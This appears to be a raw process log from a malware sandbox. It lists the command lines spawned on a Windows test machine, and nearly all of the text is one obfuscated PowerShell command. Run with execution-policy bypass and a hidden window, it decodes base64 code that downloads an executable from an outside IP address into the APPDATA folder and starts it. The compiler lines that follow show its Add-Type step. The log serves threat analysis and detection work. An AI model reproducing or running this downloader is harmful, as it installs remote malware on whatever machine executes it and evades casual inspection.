cmd.exe "C:\Windows\system32\cmd.exe" "/C POWersHelL.exe -Ex bYpaSs -NoP -w 1 -C DEvICeCREdEntIaLdEploYmEnt ; iex($(iEx('[syStem.TEXT.encoding]'+[ChAr]58+[ChaR]58+'uTf8.gETsTRINg([SySTEm.conVErt]'+[cHaR]0X3A+[ChAR]0X3a+'FrOmBASE64sTRing('+[CHAR]34+'JGlKbkVFVUxhUkVCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTG1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER4eWlLQWx0YlAsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRLZW5zaUhYLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2NoVkhOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWR4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbHVMY3EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVTWHZ3YUgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaUpuRUVVTGFSRUI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTM4LzEwNi9zYWhvc3QuZXhlIiwiJGVuVjpBUFBEQVRBXHNhaG9zdC5leGUiLDAsMCk7c1RhUlQtc2xlRVAoMyk7U3RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVxzYWhvc3QuZXhlIg=='+[ChAR]34+'))')))"
2092powershell.exe POWersHelL.exe -Ex bYpaSs -NoP -w 1 -C DEvICeCREdEntIaLdEploYmEnt ; iex($(iEx('[syStem.TEXT.encoding]'+[ChAr]58+[ChaR]58+'uTf8.gETsTRINg([SySTEm.conVErt]'+[cHaR]0X3A+[ChAR]0X3a+'FrOmBASE64sTRing('+[CHAR]34+'JGlKbkVFVUxhUkVCICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWRkLVR5UEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbWJFcmRlRkluSVRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVSTG1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER4eWlLQWx0YlAsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRLZW5zaUhYLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmd2NoVkhOLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWR4LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbHVMY3EpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIkVTWHZ3YUgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWHggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkaUpuRUVVTGFSRUI6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTM4LzEwNi9zYWhvc3QuZXhlIiwiJGVuVjpBUFBEQVRBXHNhaG9zdC5leGUiLDAsMCk7c1RhUlQtc2xlRVAoMyk7U3RBUnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTnY6QVBQREFUQVxzYWhvc3QuZXhlIg=='+[ChAR]34+'))')))"
2188csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\sw7xjah3.cmdline"
2316cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESCC83.tmp" "c:\Users\test22\AppData\Local\Temp\CSCCC73.tmp"
2364